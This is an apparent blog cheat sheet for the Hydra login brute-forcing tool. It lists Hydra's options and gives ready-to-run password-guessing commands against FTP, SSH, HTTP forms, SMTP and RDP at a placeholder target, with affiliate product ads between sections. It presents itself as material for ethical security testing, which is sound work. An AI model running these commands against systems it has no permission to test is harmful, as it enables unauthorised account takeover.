Hydra Cheat Sheet: A Basic Guide for Security Testing


Security testing is an essential part of evaluating the safety of a system or application. One critical component of these tests is password cracking attacks. Hydra is a popular tool used to perform such attacks. In this article, we will provide information on the basic usage of Hydra, its commands, and example usage scenarios for various protocols.

Learning Objectives

After reading this article, you will:

  • Understand what Hydra is and why it is used.
  • Learn the basic command structure and options of Hydra.
  • Understand how to use Hydra for different protocols.
  • Gain tips on using Hydra effectively during security tests.
Amazon Product
Programming Symbols Stickers Programming Symbols Stickers Programming Symbols Stickers

Programming Symbols Stickers 50Pcs

Waterproof, Removable, Cute, Beautiful, Stylish Teen Stickers, Suitable for Boys and Girls in Water Bottles, Phones, Suitcase Vinyl

$5.59 on Amazon

What is Hydra and Why is it Used?

Hydra is a tool designed to perform parallel login attacks. It offers broad support for different protocols and is known for its high performance. Hydra is used by ethical hackers and security experts to test the passwords of systems and applications and identify security vulnerabilities (Top 8 Brute Force Tools and Reverse Brute Force Methods).

Key features of Hydra include:

  • Parallel Operation: Hydra speeds up the process by making multiple login attempts simultaneously.
  • Multi-Protocol Support: Supports SSH, FTP, HTTP, SMB, RDP, and many other protocols.
  • Flexibility: Customizable with various options and modules.
  • User-Friendly: Easy to use with a command-line interface.

Example Hydra Usage

The basic command structure to use Hydra is as follows:


Common Options

  • -L : Username list file
  • -l : Single username
  • -P : Password list file
  • -p : Single password
  • -s : Specify port
  • -t : Number of parallel connections (default: 16)
  • -v : Verbose mode (use -vv for more verbose)
  • -V : Show login+password combination for each attempt
  • -f : Exit after the first found login/password pair
  • -e : Additional checks (s, n, r)
Amazon Product
Programming Symbols Stickers Programming Symbols Stickers Programming Symbols Stickers

Linux Commands Line Mouse pad

Linux Commands Line Mouse pad – Extended Large Cheat Sheet Mousepad. Shortcuts to Kali/Red Hat/Ubuntu/OpenSUSE/Arch/Debian/Unix Programmer. Non-Slip Gaming Desk mat

$20.95 on Amazon

Command Examples

  1. FTP Password Cracking Attack
hydra -l username -P passwords.txt ftp://target_ip

2. SSH Password Cracking Attack

hydra -L usernames.txt -P passwords.txt ssh://target_ip

3. HTTP GET Form Password Cracking Attack

hydra -L usernames.txt -P passwords.txt target_ip http-get-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"

4. SMTP Password Cracking Attack

hydra -L usernames.txt -P passwords.txt smtp://target_ip

5. RDP Password Cracking Attack

Amazon Product
The Linux Command Line

The Linux Command Line(Best Seller)

You’ve experienced the shiny, point-and-click surface of your Linux computer—now dive below and explore its depths with the power of the command line

-39% $24.31 on Amazon
hydra -L usernames.txt -P passwords.txt rdp://target_ip

Advanced Options

  • -o : Output file for results
  • -u : Loop around users, not passwords (effective for large username lists)
  • -m : Module options
  • -T : Taskset affinity

Advanced Command Example

  • SSH with Verbose Mode and Output File
hydra -L usernames.txt -P passwords.txt -s 22 -vV -o results.txt ssh://target_ip


Hydra is a powerful and flexible password-cracking tool for various protocols. It is used by security experts and ethical hackers to test the security of systems. This article aims to help you understand the basic usage of Hydra and provide example scenarios for different protocols. For more detailed information and advanced usage, refer to Hydra’s official documentation.

Leave a Comment

Join our Mailing list!

Get all latest news, exclusive deals and academy updates.